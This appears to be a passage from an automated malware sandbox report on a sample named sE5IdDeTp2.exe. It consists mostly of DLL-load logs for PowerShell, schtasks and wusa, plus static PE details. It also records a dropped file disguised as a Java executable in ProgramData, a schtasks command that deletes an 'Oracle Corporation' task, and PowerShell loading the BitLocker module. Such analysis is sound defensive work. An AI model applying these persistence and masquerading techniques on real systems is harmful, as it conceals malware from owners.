Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: sE5IdDeTp2.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: sE5IdDeTp2.exe

Static file information: File size 1245320 > 1048576

Source: sE5IdDeTp2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: sE5IdDeTp2.exe	Static PE information: section name: .00cfg
Source: dialer_java.exe.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7796F1394 push qword ptr [00007FF779723004h]; ret	0_2_00007FF7796F1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DC1394 push qword ptr [00007FF695DF3004h]; ret	15_2_00007FF695DC1403
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140001394 push qword ptr [00000001400B3004h]; ret	27_2_0000000140001403
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400035D2 push rax; ret	27_2_00000001400035D4
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400746B0 push rdi; retf	27_2_00000001400746B6
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400746CB push rdi; ret	27_2_00000001400746CC
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F711394 push qword ptr [00007FF79F743004h]; ret	34_2_00007FF79F711403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21D1394 push qword ptr [00007FF7F2203004h]; ret	48_2_00007FF7F21D1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC21394 push qword ptr [00007FF7CFC53004h]; ret	63_2_00007FF7CFC21403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA01394 push qword ptr [00007FF79AA33004h]; ret	77_2_00007FF79AA01403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779851394 push qword ptr [00007FF779883004h]; ret	91_2_00007FF779851403

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Jump to dropped file

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
